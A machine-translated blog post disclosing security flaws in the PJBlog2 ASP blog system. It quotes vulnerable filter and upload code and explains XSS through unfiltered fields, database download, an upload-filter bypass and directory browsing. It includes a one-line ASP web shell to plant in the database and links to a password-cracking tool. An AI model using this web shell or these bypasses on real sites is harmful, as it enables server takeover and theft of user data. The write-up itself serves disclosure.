PJBLOG2 is a puterjam development of a free ASP + Access personal blog system, these days I want to get a blog to play, after a comparison of selected functions, the interface is relatively good PJBlog2. After a trial, I feel that this blog is not bad, but also found a few security aspects of the small problem, my little opinion sent out. The version I am analyzing is the version of PJBlog2 v2.4.1211 released December 11, 05.
Password encryption algorithm
PJBLOG2 does not use the common MD5 algorithm to encrypt the user's password, but uses the SHA1 algorithm. The SHA1 algorithm, like MD5, is also a one-way hash function, but it outputs 160-bit values for any length of data processing.
PJBLOG2 Create a new user will randomly generate a 6-bit string salt, the user's plaintext password plus this salt value and then hash to get the encrypted password. namely: Password = SHA1 (User_pwd & Salt). The good thing about this is that even if the two passwords hash the result is completely different. This slightly "alternative" algorithm to crack the password brought a bit of difficulty.
Oh, the difficulty is not equal to not be able to crack, the internet does not have ready-made procedures, the need to write their own hands. Because. NET provides SHA1 class so originally write with vb.net, because the problem that consumes resources is not solved, had to change C. With C to achieve SHA1 source code I find a long time in a foreigner's station to find, but also good, hehe, interested can see the foreigner's SHA1 class: Http://www.codeproject.com/cpp/csha1.asp
Program can be downloaded here (Http://www.0x54.org/lake2/program/PJBlogCracker.exe), is the command line, the function is relatively weak, single-threaded speed super slow, there may be bugs, many problems after the change slightly.
Second, landing certification
PJBlog2 's authentication method is the use of cookies plus IP. When the user log in successfully, the system randomly generates a hashkey to write cookies and record them in the database, then judge the user by the HashKey, username and IP in the cookies. Cookies Good to do, you can use a cross-station, database, etc. to take, you can this IP is difficult, it seems that the possibility of cookies cheat is very small ah. Oh, then do not look at this slightly.
Three, a few local filtration is not strict
The first is statistical access to the referer filtration is not strict. See:
Copy Code code as follows:
Guest_refer=trim (Request.ServerVariables ("Http_referer"))
Conn.execute ("INSERT into Blog_counter" (coun_ip,coun_os,coun_browser,coun_referer) VALUES (' &Guest_IP& "', ' "&guest_browser (1) &" ', ' "&guest_browser (0) &" ', ' "&checkstr (guest_refer) &") "
Oh, just put the Referer filter after the Checkstr check, see CHECKSTR code:
Copy Code code as follows:
'*************************************
' Filter special characters
'*************************************
Function checkstr (ByVal chkstr)
Dim Str:str=chkstr
Str=trim (STR)
If IsNull (STR) Then
Checkstr = ""
Exit Function
End If
str = Replace (str, "&", "&")
str = Replace (str, "'", "'")
str = Replace (str, "" "", "" ")
Dim RE
Set re=new REGEXP
Re. IgnoreCase =true
Re. Global=true
Re. Pattern= "(W) (here)"
str = re.replace (str, "$1here")
Re. Pattern= "(s) (elect)"
str = re.replace (str, "$1elect")
Re. Pattern= "(i) (nsert)"
str = re.replace (str, "$1nsert")
Re. Pattern= "(c) (reate)"
str = re.replace (str, "$1reate")
Re. Pattern= "(d) (ROP)"
str = re.replace (str, "$1rop")
Re. Pattern= "(a) (Lter)"
str = re.replace (str, "$1lter")
Re. Pattern= "(d) (elete)"
str = re.replace (str, "$1elete")
Re. Pattern= "(U) (pdate)"
str = re.replace (str, "$1pdate")
Re. Pattern= "(\s) (or)
str = re.replace (str, "$1or")
Set re=nothing
Checkstr=str
End Function
Single quotes, double quotes, connectors, etc. are filtered, but the most important "<" and ">" are not filtered. Oh, cross-site scripting attacks are also useful. Note that only the previous 40 characters are displayed on the page, well constructed.
The second is the visitor comments input user name is also used in the CHECKSTR filter, user name database has restrictions, 24 characters, the construction of CSS here is more difficult, but can have other uses, the specific well, hehe, after the article details.
Some bloggers have forbidden visitors to comment, so they have to register and comment, but the name text box after registration is set to register name and read only, how to do? Oh, it doesn't matter, you can submit the data externally.
Another is the blog's message board Plug-ins, or the user name does not filter well, this is more difficult to use, only 20 characters oh.
Iv. problems with the database
PJBLOG2 's default database name is pblog.asp, although the database has a seemingly anti-download blog_notdownload table, oh, visit the database to try, can download Oh.
Since you can download, of course, you can insert ASP code run slightly. Some places (such as tourist comments) inserted ASP code will be ripped open, do not know why, depressed.
The name of the test review can be inserted into the ASP code. Said here the filter is not strict, so that the ASP inserted into the database will not be displayed, see just a guy without a name in the babble, hehe. Well, this is going to be a good construct. Oh, 24 characters and "was filtered, thought for a moment, just to find a shortest, exactly 24 characters: <%eval request (Chr (9))%>
The content of the message version can also be inserted into the ASP code, but the administrator read the message to see OH.
Oh, of course, most of the webmaster should be changed the name of the database, but the test still found a few people do not change ...
V. Uploading files
For security reasons, PJBlog2 restricts upload file types, including ASP, ASA, ASPX, CER, CDX, HTR. In fact, many virtual host not only support ASP, but also support aspx, PHP, Perl, but also can upload shtml format, so if you want to limit the best of all the server to perform the type of file is limited together.
Upload file There's still a problem here, look at the code in attachment.asp:
Copy Code code as follows:
Dim F_file,f_type
Set f_file=fileup.file ("File")
F_NAME=RANDOMSTR (1) &year (now) &month (now) &day (now) &hour (now) &minute (now) & "." &f_file.fileext
F_type=fixname (F_file.fileext)
IF f_file.filesize > Int (up_filesize) Then
Response.Write ("<div style=" "padding:6px" "><a href= ' attachment.asp ' > File size exceeded, please return back to upload </a></div > ")
ElseIF Isvalidfile (UCase (f_type)) = False Then
Response.Write ("<div style=" "padding:6px" ><a href= ' attachment.asp ' > file format illegal, please return to upload </a></div > ")
Else
F_file.saveas Server.MapPath ("attachments/" &D_Name& "/" &f_name)
Response.Write "<script>adduploaditem (' &F_Type&" ', ' attachments/' &D_Name& "/" &f_name & "'," &request.querystring ("Msave") & ") </script>"
Response.Write ("<div style=" "padding:6px" "><a href= ' attachment.asp ' > file uploaded successfully, please return to continue uploading </a></div > ")
End IF
The suffix to save the file is F_file.fileext, and check the suffix that is processed by the Fixname () function, then look at the Fixname function definition, in function.asp:
Copy Code code as follows:
'*************************************
' Filter file name
'*************************************
Function Fixname (Upfileext)
If IsEmpty (upfileext) Then Exit Function
Fixname = Ucase (Upfileext)
Fixname = Replace (FIXNAME,CHR (0), "")
Fixname = Replace (Fixname, ".", "")
Fixname = Replace (Fixname, "ASP", "")
Fixname = Replace (Fixname, "ASA", "")
Fixname = Replace (Fixname, ASPX, "")
Fixname = Replace (Fixname, CER, "")
Fixname = Replace (Fixname, "CDX", "")
Fixname = Replace (Fixname, "HTR", "")
End Function
Oh, it put the dangerous suffix filtered, if my file suffix is asp (0x00) GIF, then check the filter chr (0) and ASP, suffix became a gif, through, save the time is the ASP (0x00) gif. Theoretically is right ah, I did not have a half-day, depressed. Know the warrior told me Ah.
But we can use this to upload the ASPX format. Oh, we upload aspx file, fixname function filter asp, so suffix became x. As long as the x is set to upload format, you can pass the ASPX file.
VI. Annex Management issues
Admin login has an attachment management function, see his parameters similar to http://localhost/blog/ConContent.asp? fmenu=sqlfile&smenu=attachments&attpath=attachments/month_0512, you can browse the Web directory by specifying Attpath.
But the system limits the station to submit the data, therefore cannot directly change the URL, that "curve saves the Nation" bar. Find links to add functionality, URL to fill in our construction URL, save, and then point to view, bypassing the limit of the outside station. Note that the first character of the constructed Attpath cannot be "." and "/" Oh, the procedure is checked. We can then jump to the blog root directory: http://localhost/blog/ConContent.asp?Fmenu=SQLFile&Smenu=Attachments&AttPath=attachments/.
Hehe, finally still hope everybody supports PJBlog2, really is very easy to use AH. I hope that the author of this blog system to do a better job for the benefit of many netizens J
PS: The author is really diligent Ah, the patch has come out, hehe
